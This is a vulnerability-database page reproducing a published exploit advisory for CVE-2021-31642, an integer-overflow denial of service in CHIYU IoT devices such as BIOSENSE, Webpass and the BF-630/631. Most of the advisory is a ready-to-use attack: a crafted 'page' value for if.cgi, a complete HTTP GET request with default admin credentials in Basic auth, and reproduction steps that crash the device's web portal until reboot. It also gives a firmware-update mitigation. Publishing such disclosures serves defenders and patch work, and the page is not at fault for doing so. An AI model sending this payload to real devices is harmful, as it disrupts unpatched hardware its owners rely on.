Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSirpedrotavaresPACKETSTORM:162934
HistoryJun 03, 2021 - 12:00 a.m.

CHIYU IoT Denial Of Service

2021-06-0300:00:00
sirpedrotavares
packetstormsecurity.com
305
JSON
`# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)  
# Date: 01/06/2021  
# Exploit Author: sirpedrotavares  
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html  
# Software Link: https://www.chiyu-tech.com/category-hardware.html  
# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021  
# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC  
# CVE: CVE-2021-31642  
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks  
  
Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.  
CVE ID: CVE-2021-31642  
CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H  
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642  
  
Affected parameter: page=Component: if.cgi  
Payload:  
if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000  
  
====HTTP request======  
GET  
/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000  
HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)  
Gecko/20100101 Firefox/87.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3  
Accept-Encoding: gzip, deflate  
Authorization: Basic YWRtaW46YWRtaW4=  
Connection: close  
Referer: http://127.0.0.1/AccLog.htm  
Cookie: fresh=  
Upgrade-Insecure-Requests: 1  
  
  
  
Steps to reproduce:  
1. Navigate to the vulnerable device  
2. Make a GET request to the CGI component (if.cgi)  
3. Append the payload at the end of the vulnerable parameter (page)  
4. Submit the request and observe payload execution  
  
  
Mitigation: The latest version of the CHIYU firmware should be installed  
to mitigate this vulnerability.  
`

Related

prion 1
zdt 1
cve 1
exploitdb 1
prion
prion
Integer overflow
2021-06-01 15:15:00
zdt
zdt
CHIYU IoT Devices - Denial of Service Vulnerability
2021-06-03 00:00:00
cve
cve
CVE-2021-31642
2021-06-01 15:15:00
exploitdb
exploitdb
CHIYU IoT Devices - Denial of Service (DoS)
2021-06-03 00:00:00
JSON
Related for PACKETSTORM:162934
prion1zdt1cve1exploitdb1